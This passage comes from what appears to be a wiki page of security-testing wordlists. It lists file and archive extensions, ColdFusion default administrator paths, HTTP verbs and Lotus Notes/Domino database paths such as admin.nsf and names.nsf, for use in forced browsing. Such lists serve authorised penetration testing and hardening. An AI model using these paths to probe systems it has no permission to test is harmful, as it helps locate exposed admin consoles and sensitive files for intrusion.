.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
